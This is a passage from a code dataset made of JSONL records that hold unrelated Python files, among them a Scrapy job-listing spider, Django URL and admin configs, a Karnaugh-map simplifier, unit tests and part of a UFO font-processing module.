Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352523300","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCareo spider created on the top of ATSSpider\n\nscrapy crawl careo -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://it.careo.jp/list.php\"\n\nSample URL:\n http://it.careo.jp/list.php\n http://office.careo.jp/list.php\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import HtmlFormatter, Prefix\n\npattern = {\n 'ref_id': compile(r'no=(\\d+)'),\n}\n\n\nclass Careo(ATSSpider):\n\n name = 'careo'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n # set expected job count\n if not self.expected_job_count_set:\n expected_count = sel.xpath(\n '//div/div[@id=\"count\"]/text()'\n ).extract()\n if expected_count:\n self.expected_job_count = expected_count\n\n if not self.logo_url:\n logo_url = sel.xpath(\n '//div[@class=\"logo\"]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(response.url, logo_url[0])\n\n for href in sel.xpath(\n '//div[@class=\"result\"]/div[@class=\"item\"]//div[@class=\"go_detail\"]/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, href)\n )\n\n # pagination\n next_page = sel.xpath(\n '//ul[contains(@class, \"nombre\")]/li/a[@class=\"active\"]/../following-sibling::li[1]/a/@href'\n ).extract()\n if next_page:\n yield Request(\n callback=self.parse,\n url=urljoin(response.url, next_page[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detail\"]/div[@id=\"catchArea\"]/p[@class=\"catch\"]/text()'\n )\n loader.add_xpath(\n 'location',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('勤務地', 'utf-8')\n )\n if not loader.get_output_value('location'):\n loader.add_xpath(\n 'location',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('最寄駅', 'utf-8')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_id']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n '//div[@class=\"box\"]/div[@id=\"descript\"]'\n )\n loader.add_xpath(\n 'jobtype',\n '//div[contains(@class, \"jobdetail\")]/div[@class=\"kontakt\"]/div/strong[contains(text(), \"Art:\")]/following-sibling::text()[1]'\n )\n loader.add_xpath(\n 'jobcategory',\n '//div[@class=\"box\"]/div[@class=\"box\"]/p/text()'\n )\n loader.add_xpath(\n 'workhours',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('勤務時間', 'utf-8')\n )\n loader.add_xpath(\n 'baseSalary',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('給与', 'utf-8')\n )\n loader.add_xpath(\n 'requirements',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('求める人材・スキル要件', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_value('logo_url', self.logo_url)\n loader.add_value('apply_url', response.url)\n\n yield 
loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/careo.py","file_name":"careo.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"161198986","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\minixsv\\__init__.py\n# Compiled at: 2008-08-08 10:44:32\nXMLIF_MINIDOM = 'XMLIF_MINIDOM'\nXMLIF_4DOM = 'XMLIF_4DOM'\nXMLIF_ELEMENTTREE = 'XMLIF_ELEMENTTREE'\nEMPTY_PREFIX = None\nEMPTY_NAMESPACE = None\nXML_NAMESPACE = 'http://www.w3.org/XML/1998/namespace'\nXMLNS_NAMESPACE = 'http://www.w3.org/2000/xmlns/'\nXSD_NAMESPACE = 'http://www.w3.org/2001/XMLSchema'\nXSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'\nimport os\nMINIXSV_DIR = os.path.dirname(__file__)\nfrom xsvalErrorHandler import IGNORE_WARNINGS, PRINT_WARNINGS, STOP_ON_WARNINGS\nfrom xsvalErrorHandler import XsvalError","sub_path":"pycfiles/minixsv-0.9.0-py2.4/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"41286107","text":"import numpy as np\n\nclass CURVE():\n def __init__(self, n_examples=20, noise=0, is_train=True):\n super(CURVE, self).__init__()\n self.n_examples = n_examples\n if is_train:\n self.X = np.random.uniform(-1, 1, [self.n_examples])\n else:\n self.X = np.linspace(-1, 1, self.n_examples, dtype=np.float32)\n self.Y = self._polynomial_with_noise(self.X, noise, is_train)\n self.X = self.X.reshape([-1,1])\n self.Y = self.Y.reshape([-1,1])\n\n def _polynomial_with_noise(self, X, noise, is_train):\n Y = (X+0.5)*X*(X-0.5)\n if is_train and noise > 0:\n Y += np.random.normal(loc=0, scale=noise, size=len(X))\n return Y\n\n def showCurve(self):\n import matplotlib.pyplot as plt\n plt.plot(self.X, self.Y, 'r--')\n plt.show()\n return True\n\nif __name__ == '__main__':\n curve = CURVE(is_train=True)\n","sub_path":"CURVE_FIT/datasets/toydata.py","file_name":"toydata.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"560802138","text":"import os\nimport pandas\nfrom sklearn import linear_model\nfrom sklearn.preprocessing import StandardScaler\n\n\nscale = StandardScaler()\ndf = pandas.read_csv(os.path.dirname(os.path.abspath(__file__)) + \"/cars2.csv\")\nX = df[[\"Weight\", \"Volume\"]]\ny = df[\"CO2\"]\nscaledX = scale.fit_transform(X)\nregression = linear_model.LinearRegression()\nregression.fit(scaledX, y)\nscaled = scale.transform([[2300, 1.3]])\npredictedCO2 = regression.predict([scaled[0]])\nprint(predictedCO2)\n","sub_path":"scale/predict_co2_values.py","file_name":"predict_co2_values.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"347748614","text":"from django.contrib import admin\nfrom .models import *\n\n\n@admin.register(CaptchaBasic)\nclass CaptchaBasicAdmin(admin.ModelAdmin):\n list_display = ['token', 'code', 'authenticate', 'available',\n 'createTime', 'updateTime', 'ipAddr', 'requestSourse']\n list_filter = ['available']\n search_fields = ['token', 'ipAddr', 'requestSourse']\n ordering = ['-updateTime']\n list_per_page = 100\n\n def get_readonly_fields(self, request, obj=None):\n arr = [f.name for f in self.model._meta.fields]\n arr.remove('available')\n return arr\n","sub_path":"projects/Beiyang1895BEVersion1/apps/captcha/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"548950814","text":"import sys, re, string, pickle\nfrom itertools import *\n\ndef main():\n\tinCsv1 = open(sys.argv[1], 'r')\n\tinCsv2 = open(sys.argv[2], 'r')\n\toutCsv = open(sys.argv[3], 'w')\n\ts1, s2 = set(), set()\n\tfor l in inCsv1:\n\t\ts1.add(l.strip())\n\tfor l in inCsv2:\n\t\ts2.add(l.strip())\n\ts1 &=s2\n\tprint >> outCsv, \"\\n\".join([i for i in s1])\n\tinCsv1.close()\n\tinCsv2.close()\n\toutCsv.close()\n\n\t\t\nif __name__ == \"__main__\": main()\n","sub_path":"python/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"414731282","text":"from sellmo import modules\nfrom sellmo.api.decorators import link\n\n\n@link(namespace=modules.product.namespace, capture=True)\ndef list(index=None, qty=None, **kwargs):\n if index is None:\n index = 'product_price'\n if qty is None:\n qty = 9999999\n return {\n 'index': index,\n 'qty': qty,\n }\n\n\n@link(namespace=modules.product.namespace)\ndef list(products, query=None, **kwargs):\n if query:\n if ('sort', 'name') in query:\n products = products.order_by('name')\n elif ('sort', '-name') in query:\n products = products.order_by('-name')\n return {\n 'products': products\n }","sub_path":"example/product/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"39586868","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom core import views\n\nurlpatterns = patterns(\n '',\n # blog\n url(r'^$', views.BlogView.as_view(), {}, name='hello-world'),\n url(r'^blog/delete/(?P<id>[0-9]+)$', csrf_exempt(views.BlogView.as_view()), {}, name='delete-blog'),\n url(r'^blog$', csrf_exempt(views.BlogView.as_view()), {}, name='create-blog'),\n \n # post\n url(r'^post/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.PostView.as_view()), {}, name='create-post'),\n url(r'^post/edit/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.PostView.as_view()), {}, name='edit-post'),\n url(r'^post/delete/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.PostView.as_view()), {}, name='delete-post'),\n\n # commenting\n url(r'^post/(?P<id>[-_a-zA-Z0-9]+)/comment$', csrf_exempt(views.CommentView.as_view()), {}, name='post-comment'),\n url(r'^comment/edit/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.CommentView.as_view()), {}, name='edit-comment'),\n url(r'^comment/delete/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.CommentView.as_view()), {}, name='delete-comment'),\n\n\n url(r'^__exception_test__/$', views.exception_test, {}),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns(\n '',\n url(r'^500/$', 'django.views.generic.simple.direct_to_template', {'template': '500.html'}),\n url(r'^404/$', 'django.views.generic.simple.direct_to_template', {'template': '404.html'}),\n )\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"10336132","text":"\n\ndef get_value_from_data(obj, path=None, transform=None):\n \"\"\"\n Search obj from inner format by path.\n :param obj: searching object\n :param path: list of obj - one of str or int\n :param transform: callable function\n :return:\n \"\"\"\n if not path:\n if transform is None:\n return obj\n return transform(obj)\n root_path = path[0]\n if isinstance(obj, list):\n if isinstance(root_path, int):\n if len(obj) >= root_path:\n return get_value_from_data(obj[root_path], path[1:], transform)\n raise MapperPathError(\n obj, root_path, 'root_path index must be less then object size'\n )\n elif isinstance(obj, dict):\n if root_path in obj:\n return get_value_from_data(obj.get(root_path), path[1:], transform)\n raise MapperPathError(\n obj, root_path, 'obj must contains root_path'\n )\n else:\n raise MapperPathError(\n obj, path, 'unknown type of obj'\n )\n\n\nclass MapperPathError(ValueError):\n\n def __init__(self, obj, path, message):\n err = 'Cant\\'t find path %s from obj %s: %s' % (path, obj, message)\n super(MapperPathError, self).__init__(err)\n","sub_path":"data_mappers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"3754848","text":"from orz.ast import NodeListField\nfrom orz.visit import Environment as BaseEnvironment, Visitor\n\nfrom . import ast\nfrom .asm import Label\n\n\nclass LabelTable(object):\n\n\n def __init__(self):\n self.labels = {}\n self.gotos = {} # pending goto\n self.locals = []\n\n\n def close(self, is_last=False):\n remain = self.gotos.keys()\n if not is_last:\n return remain\n\n # TODO: sort by lexpos\n if remain:\n raise SyntaxError(\"no visible label '{}' for <goto> at line {:d}\")\n\n\n def declare_locals(self, locals):\n self.locals.extend(locals)\n\n\n def got_label(self, label):\n label.label = Label()\n name = label.name\n\n other = self.labels.get(name, None)\n\n if other is not None:\n # TODO: ,(filename, lineno, offset, text)\n raise SyntaxError(\n \"label '{}' already defined on line {:d}\".format(\n name, other.lineno))\n\n self.labels[name] = label\n\n resolved = [ goto for goto in self.gotos if goto.target == name ]\n\n for goto in resolved:\n goto.label = label.label\n nlocals = self.gotos.pop(goto)\n\n if nlocals < len(self.locals): # XXX\n raise SyntaxError(\n \"<goto {}> at line {:d} jumps into the scope of local '{}'\".format(\n name, goto.lineno, self.locals[nlocals]))\n\n\n def got_goto(self, goto):\n label = self.labels.get(goto.target, None)\n if label is None:\n self.gotos[goto] = len(self.locals)\n else:\n goto.label = label.label\n\n\n\nclass Environment(BaseEnvironment):\n FIELDS = ('filename', 'label_table')\n\n\n\nvisit = Visitor()\n\n\n\ndef nop(env, node):\n pass\n\n\ndef visit_topblock(env, node):\n label_table = LabelTable()\n\n for subnode in node.body:\n visit(env(label_table=label_table), subnode)\n\n label_table.close(True)\n return node\n\n\ndef visit_subblock(env, nodes):\n block_table = LabelTable()\n\n for node in nodes:\n visit(env(label_table=block_table), node)\n\n for goto in block_table.close():\n env.label_table.got_goto(goto)\n\n\ndef visit_body(env, node):\n visit_subblock(env, node.body)\n\n\n@visit.match(ast.Label)\ndef visit_Label(env, node):\n env.label_table.got_label(node)\n\n\n@visit.match(ast.Goto)\ndef visit_Goto(env, node):\n env.label_table.got_goto(node)\n\n\nvisit.match(ast.Block)(visit_body)\nvisit.match(ast.While)(visit_body)\nvisit.match(ast.Repeat)(visit_body)\nvisit.match(ast.For)(visit_body)\nvisit.match(ast.ForEach)(visit_body)\n\n\n@visit.match(ast.If)\ndef visit_If(env, node):\n visit_subblock(env, node.body)\n visit_subblock(env, node.orelse)\n\n\nvisit.match(ast.File)(visit_topblock)\nvisit.match(ast.Function)(visit_topblock)\n\n\n@visit.match(ast.FunctionLocal)\ndef visit_FunctionLocal(env, node):\n visit_topblock(env, node)\n env.label_table.declare_locals([node.name.id])\n\n\n@visit.match(ast.AssignLocal)\ndef visit_AssignLocal(env, node):\n env.label_table.declare_locals([t.id for t in node.target])\n\n\nvisit.match(ast.Assign)(nop)\nvisit.match(ast.CallStatement)(nop)\nvisit.match(ast.Return)(nop)\nvisit.match(ast.Break)(nop)\n","sub_path":"orz/lua/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"321861562","text":"from unittest import TestCase\nfrom unittest.mock import Mock, MagicMock, patch\nfrom atomium.converters.strings import string2lines, string_from_file, string_to_file\n\nclass String2LinesTests(TestCase):\n\n def test_line_becomes_line(self):\n self.assertEqual(string2lines(\"A line.\"), [\"A line.\"])\n\n\n def test_can_break_string_on_newline(self):\n self.assertEqual(string2lines(\"A line.\\nB line.\"), [\"A line.\", \"B line.\"])\n\n\n def test_can_handle_windows_linebreaks(self):\n self.assertEqual(string2lines(\"A line.\\r\\nB line.\"), [\"A line.\", \"B line.\"])\n\n\n\nclass StringFromFileTests(TestCase):\n\n @patch(\"builtins.open\")\n def test_gets_string_from_file(self, mock_open):\n open_return = MagicMock()\n mock_file = Mock()\n open_return.__enter__.return_value = mock_file\n mock_file.read.return_value = \"returnstring\"\n mock_open.return_value = open_return\n string = string_from_file(\"path/to/file\")\n mock_open.assert_called_with(\"path/to/file\")\n self.assertEqual(string, \"returnstring\")\n\n\n\nclass StringToFileTests(TestCase):\n\n @patch(\"builtins.open\")\n def test_saves_string_to_file(self, mock_open):\n open_return = MagicMock()\n mock_file = Mock()\n mock_write = MagicMock()\n mock_file.write = mock_write\n open_return.__enter__.return_value = mock_file\n mock_open.return_value = open_return\n string_to_file(\"filestring\", \"filename\")\n mock_open.assert_called_once_with(\"filename\", \"w\")\n mock_write.assert_called_once_with(\"filestring\")\n","sub_path":"tests/unit/converter_tests/test_string_processing.py","file_name":"test_string_processing.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"410762347","text":"import sys\nimport pprint\n\n# oi times <list of values> antistoixoun stis theseis tou pinaka alla se arithmous grey,\n# diladi to 8(1000) einai to 12(0011) se grey arithmo kai ara dixnei sth sydetagmenh:\n# 00: grammi(CD) 0 kai 11: stili(AB) 2 k.o.k.\n\nlist_of_values=[]\nif len(sys.argv) > 1:\n for i in range(len(sys.argv)):\n if i > 0:\n n = int(sys.argv[i])\n list_of_values.append(n)\n\nif len(sys.argv) == 17 :\n print('F = 1')\n\nlist_of_gray=[]\nfor i in list_of_values:\n #len = bit_len(i)\n #print(len)\n ab = bin(i >> 2)\n cd = bin(i & 0b0011)\n a = bin((i>>2)>>1)\n b = bin((i>>2) & 0b01)\n c = bin((i & 0b0011)>>1)\n d = bin((i & 0b0011) & 0b01)\n 
list_of_gray.append([a,b,c,d,i])\n\nteams=[0,0,0,0]\nteam_row = [] # oles oi grammes me 1\nteam_col = [] # oles oi stiles me 1\nsolo_ones = []\nteam_r = {}\nteam_c = {}\nvisited=[]\nfor b1 in list_of_gray:\n for b2 in list_of_gray:\n if b1[3] == b2[2] and b2 not in team_col and b1 != b2: # gia na einai to y epomeno tou x: b1[D] == b2[C]\n if (b1[0],b1[1]) == (b2[0],b2[1]): # vriskontai sthn idia stili (b1[A],b1[B])==(b2[A],b2[B])\n if (b1[0],b1[1]) not in team_c.keys():\n team_c[(b1[0],b1[1])] = [b1,b2]\n team_col.append(b1)\n team_col.append(b2)\n else:\n team_c[(b1[0],b1[1])].append(b2)\n team_col.append(b2)\n\n if b1[1] == b2[0] and b2 not in team_row and b1 != b2: # gia na einai to y epomeno tou x: b1[B] == b2[B]\n if (b1[2],b1[3]) == (b2[2],b2[3]): # vriskontai sthn idia seira\n if (b1[2],b1[3]) not in team_r.keys():\n team_r[(b1[2],b1[3])] = [b1,b2]\n team_row.append(b1)\n team_row.append(b2)\n else:\n team_r[(b1[2],b1[3])].append(b2)\n team_row.append(b2)\nfor b in list_of_gray:\n if b not in team_col and b not in team_row:\n solo_ones.append(b)\n\ngrammes = list(team_r.keys())\nstiles = list(team_c.keys())\nvisited=[[],[]]\nomades = [] # omades grammwn omadopoihmenes ana plithos stoixeiwn\ngroup = []\nmikos = 4\nplithos = 0\nwhile plithos <= len(grammes)+len(stiles):\n plithos +=1\n list_grammwn = []\n list_stilwn = []\n for x in grammes:\n for y in grammes:\n if x[1] == y[0]: # vriskontai sthn amesws epomenh grammi\n if len(team_r[x]) == len(team_r[y]) == mikos:\n if all(i[0]==j[0] and i[1]==j[1] for i,j in zip(team_r[x], team_r[y])): # tha preprei n vriskontai sthn idia stili A kai B\n if y not in list_grammwn:\n list_grammwn.append(y)\n visited[0].append(y)\n\n if len(list_grammwn) != 0:\n if len(list_grammwn)!=3:\n if list_grammwn not in omades:\n omades.append(list_grammwn)\n else:\n if (i[2] != j[2] and i[3] != j[3] for x in list_grammwn for y in list_grammwn for x in team_r[i] for y in team_r[j]):\n list_grammwn.remove(y)\n omades.append(list_grammwn)\n\n for x in stiles:\n for y in stiles:\n if x[1] == y[0]:\n if len(team_c[x]) == len(team_c[y]) == mikos:\n if all(i[2]==j[2] and i[3]==j[3] for i,j in zip(team_c[x], team_c[y])):\n if y not in list_stilwn:\n list_stilwn.append(y)\n visited[1].append(y)\n if len(list_stilwn) != 0:\n if list_stilwn not in group:\n group.append(list_stilwn)\n mikos = int(mikos/2)\n\nsolo_row=[]\nsolo_col=[]\nm = 4\nwhile m <=1:\n for x in grammes:\n if x not in visited[0] and len(team_r(x))==m:\n solo_row.append(team_r[x])\n for y in stiles:\n if y not in visited[1] and len(team_c(y))==m:\n solo_col.append(team_c[y])\n m = int(m/2)\n\ndef find_numbers(team):\n numbers=[]\n for number in team: # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n numbers.append(number[4])\n return numbers\n\ndef bitwise_and(k,n):\n return(k&n)\n\ndef bitwise_or(k,n):\n return(k|n)\n\ndef find_what_letter_has_1_or_0_(i):\n letters_with_1=[]\n letters_with_0_or_1=[0,0,0,0]\n a = bin((i>>2)>>1)\n b = bin((i>>2) & 0b01)\n c = bin((i & 0b0011)>>1)\n d = bin((i & 0b0011) & 0b01)\n if a == '0b1': # A\n letters_with_0_or_1[0] = (1)\n\n if b == '0b1': # B\n letters_with_0_or_1[1] = (1)\n\n if c == '0b1': # C\n letters_with_0_or_1[2] = (1)\n\n if d == '0b1': # D\n letters_with_0_or_1[3] = (1)\n\n return (letters_with_0_or_1)\n\ndef answerPerGroup(results):\n AnswerPerGroup=''\n for i in results:\n if i[0][0] == 1:\n AnswerPerGroup += 'A'\n if i[0][1] == 1:\n AnswerPerGroup += 'B'\n if i[0][2] == 1:\n AnswerPerGroup += 'C'\n if i[0][3] == 1:\n AnswerPerGroup += 
'D'\n if i[1][0] == 0:\n AnswerPerGroup += '~A'\n if i[1][1] == 0:\n AnswerPerGroup += '~B'\n if i[1][2] == 0:\n AnswerPerGroup += '~C'\n if i[1][3] == 0:\n AnswerPerGroup += '~D'\n return(AnswerPerGroup)\n\nresults=[]\nnumbers_of_each_col=[]\nfor i in group: # gia kathe omada stis omades stilwn\n aces = 15\n zeros = 0\n for j in i: # kathe stili sthn omada\n numbers_of_each_col += find_numbers(team_c[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers_of_each_col:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n results.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n\nresult=[]\nnumbers_of_each_row = []\nfor i in omades: # gia kathe omada stis omades grammwn\n aces = 15\n zeros = 0\n for j in i: # kathe stili sthn omada\n numbers_of_each_row += find_numbers(team_r[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers_of_each_row:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n result.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n\nres=[]\nif len(solo_row) != 0 :\n res=[] # gia monaxikes grammes\n numbers=[s]\n aces = 15\n zeros = 0\n for i in solo_row: # kathe stili sthn omada\n numbers += find_numbers(solo_row[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n res.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n\nr=[]\nif len(solo_col) != 0 :\n numbers =[]\n r=[] # gia monaxikes stiles\n aces = 15\n zeros = 0\n for i in solo_col: # kathe stili sthn omada\n print(i)\n print(solo_col[i])\n numbers += find_numbers(solo_col[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n print(bin(aces),bin(zeros))\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n r.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n \nk=0\nF=''\nif answerPerGroup(results) not in F:\n k += 1\n F = F + answerPerGroup(results)\nif answerPerGroup(result) not in F:\n k += 1\n F = F + \" V \" + answerPerGroup(result)\nif answerPerGroup(res) not in F:\n k += 1\n F = F + \" V \" + answerPerGroup(res)\nif answerPerGroup(r) not in F:\n k += 1\n F = F + \" V \" + answerPerGroup(r)\nprint('F =',F,k)\n","sub_path":"assignment-2018-3/boolean_complexity.py","file_name":"boolean_complexity.py","file_ext":"py","file_size_in_byte":8326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"508126723","text":"#Find the sum of the odd numbers within an array, after cubing the initial integers. 
\n#The function should return undefined/None/nil/NULL if any of the values aren't numbers.\n\n#Note: Booleans should not be considered as numbers.\n\n\ndef cube_odd(arr):\n a=[]\n b=[]\n for i in arr:\n if str(i).isalpha() == True:\n return None\n for i in arr:\n a.append(i**3)\n for i in a:\n if (i % 2) == 1:\n b.append(i)\n return sum(b)\n","sub_path":"odd_cube_sum.py","file_name":"odd_cube_sum.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"349569572","text":"#! python3\n\nimport math\n\ndef tempConversion(tem,by=\"C\"):\n if by == \"C\":\n answer = (tem * 9/5) + 32\n if by == \"F\":\n answer = 5 * (tem - 32) / 9\n answer = round(answer,1)\n return answer\n\ndef factorPair(a, b):\n numlist = []\n numlist.append(b)\n numlist.append(a / b)\n numlist.sort()\n return numlist\n\ndef toRadians(degree):\n resultt = math.pi / 180 * degree\n return resultt\n\n\ndef solution(n):\n n.sort()\n result = n[1]\n return result\n \n\ndef quadratic(d,f,g):\n i = (-f + math.sqrt(f ** 2 - 4 * d * g)) / (2 * d)\n n = (-f - math.sqrt(f ** 2 - 4 * d * g)) / (2 * d)\n result1 = [i,n]\n result1.sort()\n return result1\n\n\ndef cosineLaw(q,w,e,oppositeSide=True):\n if oppositeSide == True:\n result = math.sqrt(q ** 2 + w ** 2 - 2 * q * w * math.cos(toRadians(e)))\n return result\n if oppositeSide == False:\n a1 = 1\n b1 = -2 * q * math.cos(toRadians(e))\n c1 = q ** 2 - w ** 2 \n if b1 ** 2 - 4 * a1 * c1 >= 0:\n Y=quadratic(a1,b1,c1)\n x = solution(Y)\n return x\n else:\n a1 = 1\n b1 = -2 * w * math.cos(toRadians(e))\n c1 = w ** 2 - q ** 2\n Y=quadratic(a1,b1,c1)\n x = solution(Y)\n return x\n\n","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"346346521","text":"import unittest\nfrom bodydouble.body_double import BodyDouble\n\n\nclass TestSetsAttributes(unittest.TestCase):\n def test_sets_attribute_in_init(self):\n body_double = BodyDouble('foo', foo='bar', return_value='boo')\n\n assert body_double.foo == 'bar'\n assert body_double.return_value == 'boo'\n\n def test_should_get_and_set_arbitrary_attributes(self):\n body_double = BodyDouble()\n\n foo = body_double.foo\n \n assert isinstance(foo, BodyDouble)\n assert body_double.foo == foo","sub_path":"tests/test_attributes.py","file_name":"test_attributes.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"483081277","text":"# coding: utf-8\n\n\nfrom __future__ import print_function, division, absolute_import\n\nimport plistlib\nimport os\nimport logging, traceback\nimport collections\nfrom pprint import pprint\n\nfrom fontTools.designspaceLib import DesignSpaceDocument, SourceDescriptor, InstanceDescriptor, AxisDescriptor, RuleDescriptor, processRules\nfrom fontTools.varLib.models import VariationModel, normalizeLocation\n\nfrom ufoLib import fontInfoAttributesVersion1, fontInfoAttributesVersion2, fontInfoAttributesVersion3\n\nimport defcon\nfrom defcon.objects.font import Font\nfrom defcon.pens.transformPointPen import TransformPointPen\nfrom defcon.objects.component import _defaultTransformation\nfrom fontMath.mathGlyph import MathGlyph\nfrom fontMath.mathInfo import MathInfo\nfrom fontMath.mathKerning import MathKerning\n\n# if you only intend to use varLib.model then importing mutatorMath is not necessary.\nfrom 
mutatorMath.objects.mutator import buildMutator\nfrom ufoProcessor.varModels import VariationModelMutator\n\n\nclass UFOProcessorError(Exception):\n def __init__(self, msg, obj=None):\n self.msg = msg\n self.obj = obj\n\n def __str__(self):\n return repr(self.msg) + repr(self.obj)\n\n\n\"\"\"\n Processing of rules when generating UFOs.\n Swap the contents of two glyphs.\n - contours\n - components\n - width\n - group membership\n - kerning\n\n + Remap components so that glyphs that reference either of the swapped glyphs maintain appearance\n + Keep the unicode value of the original glyph.\n \n Notes\n Parking the glyphs under a swapname is a bit lazy, but at least it guarantees the glyphs have the right parent.\n\n\"\"\"\n\n\n\"\"\" \n build() is a convenience function for reading and executing a designspace file.\n documentPath: path to the designspace file.\n outputUFOFormatVersion: integer, 2, 3. Format for generated UFOs. Note: can be different from source UFO format.\n useVarlib: True if you want the geometry to be generated with varLib.model instead of mutatorMath.\n\"\"\"\n\ndef build(\n documentPath,\n outputUFOFormatVersion=3,\n roundGeometry=True,\n verbose=True, # not supported\n logPath=None, # not supported\n progressFunc=None, # not supported\n processRules=True,\n logger=None,\n useVarlib=False,\n ):\n \"\"\"\n Simple builder for UFO designspaces.\n \"\"\"\n import os, glob\n if os.path.isdir(documentPath):\n # process all *.designspace documents in this folder\n todo = glob.glob(os.path.join(documentPath, \"*.designspace\"))\n else:\n # process the \n todo = [documentPath]\n results = []\n for path in todo:\n document = 